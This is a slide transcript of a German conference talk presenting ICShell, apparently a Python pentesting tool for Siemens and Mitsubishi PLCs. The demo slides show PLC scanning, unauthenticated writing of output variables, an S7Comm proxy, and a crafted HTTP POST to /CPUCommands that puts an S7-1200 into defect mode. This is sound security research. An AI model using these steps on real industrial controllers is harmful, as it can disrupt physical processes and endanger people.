ICShell. ICShell 22. DFN-Konferenz Sicherheit in vernetzten Systemen
|
|
- Hede Heidrich
- vor 6 Jahren
- Abrufe
Transkript
1 SCADA SCADA Pentesting Pentesting made made simple simple
2 SCADA Pentesting made simple Inhalt PLC/SPS Grundlagen Kurze Einführung in das Tool
3 Moderne Industrie Automatisiert & vernetzt Fertigungsroboter, Smart-Grid, usw. Industrie 4.0 Einsatz von Informationstechnik Programmable Logic Controller (PLC/SPS)
4
5
6
7 IEC Zahlreiche Hersteller Siemens, Mitsubishi, General Electrics, Schneider etc. Standardisierung notwendig eignet sich für PLCs nach IEC 61131
8 PLCs nach IEC PLC: programmierbarer Computer Anpassung an industrielle Umgebungen Elektromagnetische Verträglichkeit Bauform (Hutschiene) etc Abgrenzung zum Standard-Computer: Zyklische Programmausführung Prozessabbild
9 PLCs nach IEC Eingangswerte lesen Prozessabbild Benutzerprogramm ausführen Ausgangswerte schreiben
10 PLCs nach IEC Eingangswerte lesen Prozessabbild Benutzerprogramm ausführen Ausgangswerte schreiben IP-Kommunikation
11 PLCs nach IEC Kommunikation Request-Response Authentifizierung nicht vorgesehen Einheitliche API
12 PLCs nach IEC Programmiersprachen IF 'INPUT1' AND 'INPUT2' THEN 'OUTPUT':= 1; ELSE 'OUTPUT':= 0; END_IF;
13 PLCs nach IEC Programmiersprachen
14 PLCs nach IEC Zusammenfassung Einheitliches Ablaufmodell Einheitliches Kommunikationsmodell Einheitliches Programmiermodell Einheitliches Tool für Sicherheitsanalysen
15 Einheitliche Kommunikation Standardisierung aus Endanwender-Sicht API Request-Response-Konzept read_var(a) send_var(a)
16 Proprietäre Binärprotokolle Implementieren IEC Proprietäre Erweiterungen Programm-Upload Debugging read_var(a)? send_var(a)
17 implementiert proprietäre Protokolle Schwachstellen in Protokollen & Implementierungen aufzeigen Einheitliche Sicherheitsbetrachtung der Geräteklasse ermöglichen read_var(a)! send_var(a)
18 Was ist nicht? Kein Ersatz für Engineering-Tools der Hersteller
19 Python, Modular aufgebaut Unterstützte Protokolle: Siemens, Mitsubishi Features: PLC identifizieren Prozessvariablen modifizieren Proxy/MitM Exploit
20 Welcome to :)
21 Welcome to :) print (5+5) 10
22 Welcome to :) print (5+5) 10 result = ics_scan(" /24")
23 Welcome to :) print (5+5) 10 result = ics_scan(" /24") Found 2 PLC: + + Type Vendor IP ConnectionType + + S71200 Siemens S7 Comm + + FX3GE Mitsubishi Melsec + +
24 clear() s7plc = result[0] ics_connect(s7plc) Ok.
25 clear() s7plc = result[0] ics_connect(s7plc) Ok. var = VarBool() var.address = 0x var.area = Var.AREA_OUTPUT
26 clear() s7plc = result[0] ics_connect(s7plc) Ok. var = VarBool() var.address = 0x var.area = Var.AREA_OUTPUT
27 clear() ics_getvar(s7plc, var) Ok.
28 clear() ics_getvar(s7plc, var) Ok. var.show() Typ: Bool Area: Output Address: 0x Value: False
29 clear() ics_getvar(s7plc, var) Ok. var.show() Typ: Bool Area: Output Address: 0x Value: False var.value = True
30 clear() ics_getvar(s7plc, var) Ok. var.show() Typ: Bool Area: Output Address: 0x Value: False var.value = True ics_setvar(s7plc, var)
31 clear() ics_getvar(s7plc, var) Ok. var.show() Typ: Bool Area: Output Address: 0x Value: False var.value = True ics_setvar(s7plc, var) Ok.
32 clear() ics_getvar(s7plc, var) Ok. var.show() Typ: Bool Area: Output Address: 0x Value: False var.value = True ics_setvar(s7plc, var) Ok. K A e n i e e i z i f i t n e h t u r o v g n ru n e d n a h
33 clear() ics_proxy(s7plc, Display_Var)
34 clear() ics_proxy(s7plc, Display_Var) INFO: Incoming connection from (' ', 49253) INFO: S7Comm: New Client Connected. INFO: new pdu > forward to plc + + Address Area Type Value Raw + + 0x input Boolean true 01 0x input Boolean false 00 0x input Integer
35 clear() plc = S71200() plc.host = ' ' ics_exploit(plc, S71200_HTTPS_POST_DEFECT_MODE) Ok.
36 Siemens Security Advisory CVE SSA pdf vom Firmware 4.0
37 POST /CPUCommands HTTP/1.1 Host: Content Length: 26 PriNav=Start&Run=Go+to+RUN
38 POST /CPUCommands HTTP/1.1 Host: Content Length: 1 PriNav=Start&Run=Go+to+RUN
39 POST /CPUCommands HTTP/1.1 Host: Content Length: 1 PriNav=Start&Run=Go+to+RUN
40 d e r i u q e POST /CPUCommands HTTP/1.1 R Host: t r a Content Length: 1 t s e PriNav=Start&Run=Go+to+RUN R d l o C e t e l p m o C
41 Ausblick Veröffentlichung: Erweiterungen: Mehr Protokolle Weitere Funktionen Offen für Ihrer Vorschläge/Ihren Code
Typische IT-Sicherheitsprobleme. IT-Sicherheitsprobleme in
Typische Typische IT-Sicherheitsprobleme IT-Sicherheitsprobleme in in Industriesteuerungen Industriesteuerungen am am Beispiel Beispiel der der Siemens Siemens SIMATIC SIMATIC S7-1200 S7-1200 Inhalt ICS
MehrTheorie und Praxis einer JSON-RPC-basierten Web-API
Theorie und Praxis einer JSON-RPC-basierten Web-API Christian Krause Christian.Krause@raritan.com Raritan Deutschland GmbH Chemnitzer LinuxTage 2015 Gliederung 1 2 Remote Procedure Call Interface Definition
Mehrphp Hier soll ein Überblick über das Erstellen von php Programmen gegeben werden. Inhaltsverzeichnis 1.Überblick...2 2.Parameterübergabe...
php Hier soll ein Überblick über das Erstellen von php Programmen gegeben werden. Inhaltsverzeichnis 1.Überblick...2 2.Parameterübergabe...7 3.Zugriff auf mysql Daten...11 Verteilte Systeme: php.sxw Prof.
MehrVMware vrealize Log Insight- Entwicklerhandbuch
VMware vrealize Log Insight- Entwicklerhandbuch vrealize Log Insight 2.5 Dieses Dokument unterstützt die aufgeführten Produktversionen sowie alle folgenden Versionen, bis das Dokument durch eine neue Auflage
MehrVerwundbarkeit Vernetzter Industriesteuerungen - Lagebild, Angriffe, Schutzmaßnahmen -
Verwundbarkeit Vernetzter Industriesteuerungen - Lagebild, Angriffe, Schutzmaßnahmen - Jan-Ole Malchow, Johannes Klick, Prof. Volker Roth AG Sichere Identität Fachbereich Mathematik und Informatik Freie
MehrEin Jahr mit dem. Play! Framework FLAVIA IT. Dmitrij Funkner & Jonas Kilian. Quelle: http://www.flickr.com/photos/sdasmarchives/6996901834
Ein Jahr mit dem Play! Framework FLAVIA IT Dmitrij Funkner & Jonas Kilian Quelle: http://www.flickr.com/photos/sdasmarchives/6996901834 Über uns dmitrij funkner jonas kilian Konzentration auf das Wesentliche
Mehr2. Interaktive Web Seiten. action in Formularen. Formular. Superglobale Variablen $ POST, $ GET und $ REQUEST. GET und POST
2. Interaktive Web Seiten GET und POST Die Übertragungsmethoden GET und POST sind im http Protokoll definiert: POST: gibt an, dass sich weitere Daten im Körper der übertragenen Nachricht befinden: z.b.
MehrPHP-Schwachstellen und deren Ausnutzung
PHP-Schwachstellen und deren Ausnutzung 44. DFN Betriebstagung / 7. Februar 2006 DFN-CERT Services GmbH Jan Kohlrausch / CSIRT Gliederung Grundlagen HTTP und PHP Anatomie typischer Schwachstellen in PHP-Skripten
MehrAblauf Unit2. Walkthrough
Ablauf Unit2 Vertiefendes Uebungsprojekt - SQL II Gerhard Wohlgenannt Test Vorstellung der Arbeitsumgebung (Software, Locations) Walkthrough Gruppeneinteilung + Themenvergabe Vorstellung der Arbeitsumgebung
MehrNagios Erweiterungen Der Rest. Nagios / Icinga. OpenSource Network-Monitoring im großen Stil. Manuel Landesfeind
Erweiterungen Der Rest / Icinga OpenSource Network-Monitoring im großen Stil Manuel Landesfeind Institut für Mathematik Georg-August-Universität Göttingen This presentation can be used under the terms
MehrMobilkommunikation. REST-basierte Dienste für verteilte, mobile Anwendungen. A. Gillert, A. Grebe, M. Hüffmeyer, C. Vogt
Mobilkommunikation REST-basierte Dienste für verteilte, mobile Anwendungen A. Gillert, A. Grebe, M. Hüffmeyer, C. Vogt Fachhochschule Köln, Institut für Nachrichtentechnik Fachhochschule Köln Anton Gillert,
Mehr!"# $ % Internet Protokolle: HTTP 1/38
!"# $ % Internet Protokolle: HTTP 1/38 1 Themenübersicht Schichtenmodell Gopher /FTP Statistik URL Einleitung Anwendungsablauf Beispiel mit Telnet Request, Response Anfragemethoden header Negotiation Proxyserver
MehrEnergiemanagement auf Basis einer Vertrauensinfrastruktur von Schutzprofilen zu innovativen Geschäftsmodellen in der Energiewirtschaft
Energiemanagement auf Basis einer Vertrauensinfrastruktur von Schutzprofilen zu innovativen Geschäftsmodellen in der Energiewirtschaft Thomas Weisshaupt, Business Development Smart Energy Energiewende
MehrTheoretische Aspekte
Webserver mit Win32 API Datum: 04.02.03 Autor: Michael Hielscher Homepage: www.genesis-x7.de Theoretische Aspekte Aufbau eines Webservers Als erstes sollte man im Abschnitt Multithreaded SocketServer nachlesen
MehrContainer-Klassen in Delphi
Verwalten von Objekten mit Hilfe von Container-Klassen am Beispiel eines Memory Spieles Container-Klassen in Delphi Michael Puff mail@michael-puff.de 2010-03-26 Inhaltsverzeichnis Inhaltsverzeichnis 1
MehrWiederholung: Beginn
B) Webserivces W3C Web Services Architecture Group: "Ein Web Service ist eine durch einen URI eindeutige identifizierte Softwareanwendung, deren Schnittstellen als XML Artefakte definiert, beschrieben
MehrMethodische Grundlagen des Software Engineering - Übung 9
Engineering - Übung 9 9 Prozess und Softwarequalität Abgabe der Hausaufgaben am Anfang der jeweiligen Präsenzübung am 14.06.2011 bzw. 15.06.2011. Hinweise und Kontakt: Veranstaltungsseite 1 9.1 Grundlagen
MehrInterface Beschreibung MODTCP 9499 040 921 valid from 8447. MODTCP-Server Bedienterminal für Modulares Reglersystem KS vario BT
PMA Prozeß- und Maschinen-Automation GmbH MODTCP-Server Bedienterminal für Modulares Reglersystem KS vario BT Interface Beschreibung MODTCP 9499 040 921 valid from 8447 PMA Prozeß- und Maschinen-Automation
MehrVersion/Datum: 1.5 13-Dezember-2006
TIC Antispam: Limitierung SMTP Inbound Kunde/Projekt: TIC The Internet Company AG Version/Datum: 1.5 13-Dezember-2006 Autor/Autoren: Aldo Britschgi aldo.britschgi@tic.ch i:\products\antispam antivirus\smtp
MehrIndustrielle Bussysteme : Modbus/TCP
Industrielle Bussysteme : Modbus/TCP Dr. Leonhard Stiegler Automation www.dhbw-stuttgart.de Inhalt Modbus/TCP Grundsätze und Versionen Protokollbeschreibung Datenmodell und Datencodierung Adressierung
MehrJava - Webapplikationen
Java - Webapplikationen Bestandteile (HTTP,, JSP) Aufbau (Model View Controller) Datenverwaltung (Java Beans, Sessions) Entwicklung (Projektstruktur, Sysdeoplugin für Eclipse) 17. Januar 2006 Jan Hatje
MehrAndroid VPN. Am Beispiel eines Netzwerktunnels für das Domain Name System (DNS) 1 Andiodine - Android DNS-VPN
Android VPN Am Beispiel eines Netzwerktunnels für das Domain Name System () 1 Inhalt VPN Framework in Android Übersicht zu Iodine Funktionsweise Demonstration 2 VPN und Android Verfügbar seit Android 4.0
MehrInternetanbindung von Datenbanken
Internetanbindung von Datenbanken http://galahad.informatik.fh-kl.de/~miesel/index.html PHP -1 Gliederung Einführung PHP3 Datenbankanbindung mit PHP3 Sicherheitsprobleme Realisierung mit PHP3 Probleme
MehrSecurity by Design Prinzipiell sicher!?
Security by Design Prinzipiell sicher!? Thomas Bleier Dipl.-Ing. MSc zpm CISSP CISM CEH Program Manager ICT Security Safety & Security Department AIT Austrian Institute of Technology GmbH AIT Austrian
MehrSMS-API. Sloono Schnittstellenbeschreibung. Version 1.2 Stand 22.10.2014
SMS-API Sloono Schnittstellenbeschreibung Version 1.2 Stand 22.10.2014 Diese Seiten über die SLOONO-APIs sollen Ihnen helfen SLOONO in Ihre bestehenden Anwendungen zu integrieren oder neue Anwendungen
MehrVPN Tracker für Mac OS X
VPN Tracker für Mac OS X How-to: Kompatibilität mit DrayTek Vigor VPN Routern Rev. 3.0 Copyright 2003-2005 equinux USA Inc. Alle Rechte vorbehalten. 1. Einführung 1. Einführung Diese Anleitung beschreibt,
MehrSilverstripe CMS und das Sapphire Framework
Silverstripe CMS und das Sapphire Framework kurz über mich... Seit 2002 mit PHP Typo3, Wordpress, Radiant (RoR) reingeschaut: Symfony, Zend Seit 2009 Webentwicklung mit SilverStripe Geschichte von SilverStripe
MehrWEBPROGRAMMIERUNG DATEN AUS DEM WEB AUTOMATISIERT VERARBEITEN
WEBPROGRAMMIERUNG DATEN AUS DEM WEB AUTOMATISIERT VERARBEITEN Martin Guggisberg 5.9.2015 Weiterbildung: Programmieren im Unterricht mit Python AGENDA Fakten und Grundlagen zum Web Strukturierte Daten (JSON)
MehrSuchen und Finden mit Lucene und Solr. Florian Hopf 04.07.2012
Suchen und Finden mit Lucene und Solr Florian Hopf 04.07.2012 http://techcrunch.com/2010/08/04/schmidt-data/ Suche Go Suche Go Ergebnis 1 In Ergebnis 1 taucht der Suchbegriff auf... Ergebnis 2 In Ergebnis
MehrÜbungen zu Softwaretechnik
Prof. Dr. Dr. h.c. M. Broy Lösungsblatt 11 Dr. H. Ehler, S. Wagner 23. Januar 2004 Übungen zu Softwaretechnik Aufgabe 16 Qualitätseigenschaften Broker-Pattern Beurteilen Sie das in Aufgabe 15 benutzte
MehrRIPS. Automatisierte Schwachstellenerkennung in PHP-Software mittels statischer Quellcode-Analyse. BSI - 12. Deutscher IT-Sicherheitskongress
BSI - 12. Deutscher IT-Sicherheitskongress 10.-12. Mai.2011, Bonn Automatisierte Schwachstellenerkennung in PHP-Software mittels statischer Quellcode-Analyse, Ruhr-Universität Bochum 1 1.1 Motivation Schwachstellen
MehrGrundlagen der Informatik 2
Grundlagen der Informatik 2 Dipl.-Inf., Dipl.-Ing. (FH) Michael Wilhelm Hochschule Harz FB Automatisierung und Informatik mwilhelm@hs-harz.de Raum 2.202 Tel. 03943 / 659 338 1 Gliederung 1. Einführung
MehrEntwicklung einer echtzeitfähigen CLI-Laufzeitumgebung für den Einsatz in der Automatisierungstechnik
Entwicklung einer echtzeitfähigen CLI-Laufzeitumgebung für den Einsatz in der Automatisierungstechnik Echtzeit 2010 Alexej Schepeljanski Martin Däumler Matthias Werner Echtzeit 2010 / 18. November 2010
MehrRechnernetze. 6. Übung
Hochschule für Technik und Wirtschaft Studiengang Kommunikationsinformatik Prof. Dr. Ing. Damian Weber Rechnernetze 6. Übung Aufgabe 1 (TCP Client) Der ECHO Service eines Hosts wird für die Protokolle
MehrWeb-Anwendungsentwicklung mit dem Delivery Server
Web-Anwendungsentwicklung mit dem Delivery Server Java-Framework auf Basis der Open API Bernfried Howe, Webertise Consulting GmbH WEBertise Consulting Dipl. Informatiker (Wirtschaftsinformatik) 2001-2010
MehrJSP JSTL. JEE Vorlesung Teil 6. Ralf Gitzel ralf_gitzel@hotmail.de
JSP JSTL JEE Vorlesung Teil 6 Ralf Gitzel ralf_gitzel@hotmail.de 1 Übersicht Ralf Gitzel ralf_gitzel@hotmail.de 2 Übersicht Wiederholung / Vertiefung JSTL Grundlagen JSTL Basisbefehle Templates über JSTL
MehrHIN Client API. Technische Schnittstelle. Version: 1.0 Datum: 01.11.2010 Status: Final
HIN Client API Technische Schnittstelle Version: 1.0 Datum: 01.11.2010 Status: Final Health Info Net AG (HIN) Pflanzschulstrasse 3 8400 Winterthur support@hin.ch www.hin.ch Tel. 0848 830 740 Inhaltsverzeichnis
MehrGerman English Firmware translation for T-Sinus 154 Access Point
German English Firmware translation for T-Sinus 154 Access Point Konfigurationsprogramm Configuration program (english translation italic type) Dieses Programm ermöglicht Ihnen Einstellungen in Ihrem Wireless
MehrRechnernetze I SS 2014. Universität Siegen rolanda.dwismuellera@duni-siegena.de Tel.: 0271/740-4050, Büro: H-B 8404. Stand: 9.
echnernetze I SS 2014 oland Wismüller Universität Siegen rolanda.dwismuellera@duni-siegena.de Tel.: 0271/740-4050, Büro: H-B 8404 Stand: 9. Mai 2014 oland Wismüller Betriebssysteme / verteilte Systeme
MehrAblauf. Wichtige Termine. Vertiefendes Übungsprojekt - SQL II
Ablauf Wichtige Termine Ablauf der Lehrveranstaltung Vorstellung des Projektthemas Projektgruppen Vorstellung der Arbeitsumgebung (Software, Locations) Walkthrough Datenbankentwurf Formulare PHP Security
MehrEin- und Ausgabe von Paketen für Netzwerkverbindungen 208
Ein- und Ausgabe von Paketen für Netzwerkverbindungen 208 Zwischen Dienste-Anbietern und ihren Klienten auf dem Netzwerk besteht häufig ein ähnliches Verhältnis wie zwischen einer Shell und dem zugehörigen
MehrRechnernetze I. Rechnernetze I. 9 Anwendungsprotokolle SS 2014
Rechnernetze I SS 2014 Universität Siegen rolanda.dwismuellera@duni-siegena.de Tel.: 0271/740-4050, Büro: H-B 8404 Stand: 10. August 2015 Betriebssysteme / verteilte Systeme Rechnernetze I (1/13) i Rechnernetze
MehrSCHNELLEINSTIEG ZUM TOOL NODEBUILDER
Fakultät Informatik, Institut für Angewandte Informatik, Professur Technische Informationssysteme SCHNELLEINSTIEG ZUM TOOL NODEBUILDER Betreuer: Dipl.-Ing. A. Cemal Özlük Dipl.-Inf. Uwe Ryssel ALLGEMEINE
MehrHow-To-Do. Hardware Configuration of the CC03 via SIMATIC Manager from Siemens
How-To-Do Hardware Configuration of the CC03 via SIMATIC Manager from Siemens Content Hardware Configuration of the CC03 via SIMATIC Manager from Siemens... 1 1 General... 2 1.1 Information... 2 1.2 Reference...
MehrOPP-ROOM Raumtemperatur-Regler C1
OPP-ROOM Raumtemperatur-Regler C1 Protokoll BACnet-Schnittstelle (BACnet MS/TP) Entwicklungsstand: ab Software 1.08 Einstellen der Mac-Adresse und der Baudrate Die MAC-Adresse und die Baudrate können entweder
MehrInhalt. Erreichbarkeit von VPN-Gateways hinter einem Genexis FTTH-Abschlussrouter
Dieses Dokument beschreibt die notwendigen Einstellungen, um ein VPN-Gateway hinter einer Genexis OCG-218M/OCG-2018M und HRG1000 LIVE! TITANIUM trotz NAT-Funktion erreichbar zu machen. Inhalt 1 OCG-218M/OCG-2018M...
MehrWeb Services - Tutorial
RPG als Web Service Client Mihael Schmidt 0.1 Juli 2007 2007, 2008 Mihael Schmidt All rights reserved. Table of Contents 1. Allgemeines 1 1.1 Client... 1 1.2 Anwendungsserver... 1 2. Client 2 2.1 WSDL...
MehrCrashkurs http - CGI/Servlets(JSF) - Viewer
jkrueger(at)cebitec.uni-bielefeld.de http TCP Referenzmodell : ApplicationLayer zustandloses Protokoll textbasiert für Hypertext entwickelt ist es nicht darauf beschränkt Nachrichten : Request : Client
MehrMul$media im Netz (Online Mul$media) Wintersemester 2014/15. Übung 02 (Nebenfach)
Mul$media im Netz (Online Mul$media) Wintersemester 2014/15 Übung 02 (Nebenfach) Mul=media im Netz WS 2014/15 - Übung 2-1 Organiza$on: Language Mul=ple requests for English Slides Tutorial s=ll held in
MehrXML-RPC zur Backend- Kommunikation in einem mobilen SBB-Projekt
XML-RPC zur Backend- Kommunikation in einem mobilen SBB-Projekt Peter K. Brandt 09. März 2005 1 Einleitung RailML.org: XML als Datenaustauschformat Anderer Anwendungszweck von XML: Interaktion von Live-Systemen
MehrApplication Note. Anbindung von Kunden-Software an SpiderControl Web Visualisierung
2015-02-25 1 of 6 Application Note Anbindung von Kunden-Software an SpiderControl Web Visualisierung Version ApplicationNote_AnbindungFremdsoftware /Version Seite 1 / 6 Version Datum Kommentar Autor 0.1
MehrDas Saia PCD Kommunikationskonzept "Einführung"
1 Das Saia PCD Kommunikationskonzept "Einführung" Inhalt - S-Net -> Das Saia PCD Kommunikationskonzept - Die Saia Netze - Die Saia S-Net Bandbreiten - Saia S-Net erweitert für andere Netze - Seriel S-Net
MehrStuxnet eine Einführung. Thomas Reinhold reit@hrz.tu-chemnitz.de
Stuxnet eine Einführung Thomas Reinhold reit@hrz.tu-chemnitz.de Gliederung des Vortrags Zum Begriff Cyberspace Typen und Klassifikationen von Schadsoftware Das Konzept SCADA Stuxnet Die wichtigsten Ereignisse
MehrAmazon S3 und Google Cloud Storage Hochschule Mannheim
Pascal Krause Cloud Computing-Seminar Hochschule Mannheim SS2012 1/31 Amazon S3 und Google Cloud Storage Hochschule Mannheim Pascal Krause Fakultät für Informatik Hochschule Mannheim 922045@stud.hs-mannheim.de
MehrSkalierbare Webanwendungen mit Python und Google App Engine
Skalierbare Webanwendungen mit Python und Google App Engine Oliver Albers 03. Juli 2008 1/32 Einführung Worum geht es? Pro und Contra Technik Genereller Aufbau Anwendungskonfiguration Verarbeitung von
MehrAutomatisierungsarchitekturen für das Smart Grid Am Beispiel der OPC UA und der IEC 61970. Dr.-Ing. Mathias Uslar, Sebastian Rohjans
Automatisierungsarchitekturen für das Smart Grid Am Beispiel der OPC UA und der IEC 61970 Dr.-Ing. Mathias Uslar, Sebastian Rohjans 2 OPC Foundation Vision: OPC-Technologien sollen überall dort zur Interoperabilitäts-Basis
MehrWebservices. 1 Einführung 2 Verwendete Standards 3 Web Services mit Java 4 Zusammenfassung. Hauptseminar Internet Dienste
Hauptseminar Internet Dienste Sommersemester 2004 Boto Bako Webservices 1 Einführung 2 Verwendete Standards 3 Web Services mit Java 4 Zusammenfassung Was sind Web Services? Web Services sind angebotene
MehrSakuli End2End-Monitoring
Sakuli End2End-Monitoring Simon Meggle 21.05.2014 AGENDA Begriff "End2End-Monitoring" die Situation und ihre Herausforderung Funktionsweise von Sahi/Sikuli Die Tools und ihre Stärken im Vergleich Aus zwei
MehrNoch für heute: primitive Datentypen in JAVA. Primitive Datentypen. Pseudocode. Dezimal-, Binär- und Hexadezimalsystem. der logische Typ boolean
01.11.05 1 Noch für heute: 01.11.05 3 primitie Datentypen in JAVA Primitie Datentypen Pseudocode Name Speichergröße Wertgrenzen boolean 1 Byte false true char 2 Byte 0 65535 byte 1 Byte 128 127 short 2
MehrMicrosoft.NET & IBM System i - Webanwendungen und Webservices II Christian Neißl, 20.11.2011
Microsoft.NET & IBM System i - Webanwendungen und Webservices II Christian Neißl, 20.11.2011 Der älteste und noch immer verwendete Weg Daten über Web auszutauschen ist das http - Protokoll. Mit der http-methode
MehrBewertung der IT-Sicherheit von Industriellen Steuerungsumgebungen
Bewertung der IT-Sicherheit von Industriellen Steuerungsumgebungen Werkzeuge für den leichtgewichtigen Einstieg in industrielle Cyber-Security 12.08.2014 Michael Gröne Sirrix AG security technologies Zum
MehrInternet Security Vortrag
Internet Security Vortrag SMB / CIFS Sicherheit Mario Bacic 27.04.2004 27.04.2004 SMB/CIFS Security Mario Bacic Seite 1 Inhalt 1.Einordnung 2.Geschichte 3.Klassisches SMB Protokoll 4.Erweiterungen in CIFS
MehrPiXtend mit CODESYS Projekt erstellen
Erstellen eines neuen CODESYS Projektes. Einbinden von PiXtend als CODESYS Gerät. Erstellung eines einfachen Beispielprogrammes. Erstellen einer einfachen Visualisierung Stand 14.12.2014, V1.00 Qube Solutions
MehrLua. June 9, 2015. Marcus Brenscheidt Marcin Golkowski ( Dynamische Programmiersprachen Lua )
Lua Marcus Brenscheidt Marcin Golkowski Dynamische Programmiersprachen June 9, 2015 June 9, 2015 1 / 15 Geschichte I Entwickelt von Roberto Ierusalimschy, Luiz Henrique und Waldemar Celes Mitglieder der
MehrXML-RPC, SOAP und Web Services. Jörn Clausen joern@techfak.uni-bielefeld.de
XML-RPC, SOAP und Web Services Jörn Clausen joern@techfak.uni-bielefeld.de Übersicht Was ist RPC? Was hat XML mit RPC zu tun? Was sind XML-RPC und SOAP? Was sind Web Services? Wird das die Welt retten?
MehrASP: Active Server Pages
ASP: Active Server Pages Allgemeines: ASP ist die serverseitige Schnittstelle zu Skripten/Programmen ausgehend vom Microsoft-Internet- Information-Server (z.b. in Windows Server enthalten) Skript- und
MehrDBUS Interprozess-Kommunikation für Embedded-Plattformen
DBUS Interprozess-Kommunikation für Embedded-Plattformen Andreas Schwarz Neratec Solutions AG Firmenprofil Neratec Solutions AG Produkt-Entwicklungen für kundenspezifische elektronische Produkte Produkte
MehrSpock und Geb (WebDriver) Wie können freie Werkzeuge zum strukturierten Testen von Web-Applicationen eingesetzt werden?
Stuttgarter Test-Tage 21. & 22. März 2013 Spock und Geb (WebDriver) Wie können freie Werkzeuge zum strukturierten Testen von Web-Applicationen eingesetzt werden? Christian Baranowski Willkommen Christian
MehrActiveCharts. Verknüpfung von Modellen und Code bei der modellgetriebenen Softwareentwicklung mit UML 2.0
Jens Kohlmeyer 05. März 2007 Institut für Programmiermethodik und Compilerbau ActiveCharts Verknüpfung von Modellen und Code bei der modellgetriebenen Softwareentwicklung mit UML 2.0 Seite 2 Übersicht
MehrNext Generation Firewall: Security & Operation Intelligence
Next Generation Firewall: Security & Operation Intelligence Umfassend über unterschiedliche Infrastrukturbereiche (P, DC, RA) Flexible Umsetzung: unterschiedliche Topologien & Plattformen Eine Richtlinie:
MehrInternet Protokolle für Multimedia - Anwendungen
Internet Protokolle für Multimedia - Anwendungen Kapitel 5.7 Streaming im Web (RTSP) 1 Streaming Media (1) Streaming Media Strom ist kontinuierlich wird unmittelbar während des Empfangs wiedergegeben wird
MehrSoftwarepraktikum - Verteidigung Entwurf LDAP-Interfaces für majordomo und Web
Softwarepraktikum - Verteidigung Entwurf LDAP-Interfaces für majordomo und Web Michael Weiser, Steffen Wolf, 99IN 22. Mai 200 WEB-INTERFACE 2 Web-Interface. Softwareschnittstellen Webserver in Entwicklung
MehrWebservices Ein Vortrag von:
Webservices Ein Vortrag von: Andreas Münstermann Michael Reiher Markus Buschky Gliederung Einführung in Webservices Technische Grundlagen SOAP UDDI WSDL Sicherheitskonzepte Blick in die Zukunft Einführung
MehrFunktionale Programmierung
Schleifen 1 Funktionale Programmierung Jörg Kreiker Uni Kassel und SMA Solar Technology AG Wintersemester 2011/2012 3 Teil I Jedem Anfang wohnt ein Zauber inne 4 Über mich Diplom in Informatik in Saarbrücken
MehrWeb- und Gridservices zur Überwindung von Heterogenität. Bearbeiter: Lei Xia 16.07.2004
Web- und Gridservices zur Überwindung von Heterogenität Bearbeiter: Lei Xia 16.07.2004 Gliederung Einleitung Formen von Heterogenität Grundlagen Web Services als Schnittstelle zu DBMS Grid Data Services
MehrService & Support. Wie projektieren Sie eine VNC Verbindung mit einem Industrial Thin Client SIMATIC ITC? Thin Client.
Deckblatt Wie projektieren Sie eine VNC Verbindung mit einem Industrial Thin Client SIMATIC ITC? Thin Client FAQ August 2012 Service & Support Answers for industry. Fragestellung Dieser Beitrag stammt
MehrJava Sicherheit Das wahre Leben
Moritz Jodeit IT Security Consultant Java Sicherheit Das wahre Leben OOP 2011 26.01.2011 Me, myself and I» IT Security Consultant bei n.runs AG» Schwerpunkte» Penetrationstests» Source Code Audits» Binär-Analysen»
MehrSeminar aus Informatik
2012-06-15 Intrusion Detection Systems (IDS) Ziel: Erkennung von Angriffen und Ausbrüchen Host Based IDS Läuft auf dem Host Ist tief im System verankert Hat Zugriff auf: Prozessinformationen Netzwerkverkehr
MehrMod_com.lib. Inhalt. WAGO-I/O-PRO 32 Bibliothek
Anhang A Weitere Bibliotheken WAGO-I/O-PRO 32 Bibliothek Mod_com.lib Inhalt ADD_DESC (Datentyp)...2 ADD_PI_INFORMATION...4 CRC16...6 FBUS_ERROR_INFORMATION...7 GET_DIGITAL_INPUT_OFFSET...8 GET_DIGITAL_OUTPUT_OFFSET...10
MehrRTOS lernt Scripting dank Lua. - Raphael Zulliger, Indel AG
RTOS lernt Scripting dank Lua - Raphael Zulliger, Indel AG Embedded Computing Conference 2012 Informationen zur Download-Version der Folien Diese Folien dienen als visuelle Unterstützung des Referenten
MehrVisual Basic Basisbefehle Hinweis: Der Text in eckigen Klammern [ ] ist variabel, z.b. [var] => 5.3. Eckige Klammern sind stets wegzulassen!
Visual Basic Basisbefehle Hinweis: Der Text in eckigen Klammern [ ] ist variabel, z.b. [var] => 5.3. Eckige Klammern sind stets wegzulassen! Grundstrukturen: Sub [name]([übergabe]) End Sub [Übergabe] ist
MehrDr. Sebastian Obermeier, ABB Forschungszentrum Baden-Dättwil, 18.3.2015 Sicherheit kritischer Infrastrukturen
Dr. Sebastian Obermeier, ABB Forschungszentrum Baden-Dättwil, 18.3.2015 Sicherheit kritischer Infrastrukturen Embedded Devices Software ist eine Kernkomponente SCADA and Control Systems Software ist eine
MehrHackerpraktikum SS 202
Hackerpraktikum SS 202 Philipp Schwarte, Lars Fischer Universität Siegen April 17, 2012 Philipp Schwarte, Lars Fischer 1/18 Organisation wöchentliche Übung mit Vorlesungsanteil alle zwei Wochen neue Aufgaben
MehrFolgende Voraussetzungen für die Konfiguration müssen erfüllt sein: - Grundkonfiguration des Routers. - Ein Bootimage ab Version 7.4.x.
7. PPPoE Server 7.1 Einleitung Im Folgenden wird die Konfiguration einer Dialin Verbindung über PPPoE zum Router beschrieben, um eine zusätzliche Authentifizierung durchzuführen. Bei der Einwahl eines
MehrSecurity. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung
6. Zone Defense 6.1 Einleitung Im Folgenden wird die Konfiguration von Zone Defense gezeigt. Sie verwenden einen Rechner für die Administration, den anderen für Ihre Tests. In der Firewall können Sie entweder
MehrMapping between group names and addresses in hybrid multicast
Mapping between group names and addresses in hybrid multicast Sebastian Wölke Sebastian.Woelke@informatik.haw-hamburg.de University of Applied Sciences Hamburg Dezember 05, 2012 Hochschule für Angewandte
MehrGehackte Webapplikationen und Malware
2014-04-11 Vorstellung Beispiel Motivation Veraltete Webanwendungen Betreibe kleinen Webhoster (schokokeks.org), Fokus auf Datenschutz, Sicherheit, freie Software Zahlen: 2 Admins, ca. 300 Kunden, 1000
MehrDiscovery Tool für COMbricks PROCENTEC
Die PROFIBUS und PROFINET Spezialisten Discovery Tool für Schnell-Start PROCENTEC Die PROFIBUS und PROFINET Anleitung Spezialisten Copyright 2012 PROCENTEC. All rights reserved Einleitung Das Discovery
MehrTYPO3 Commerce Extension
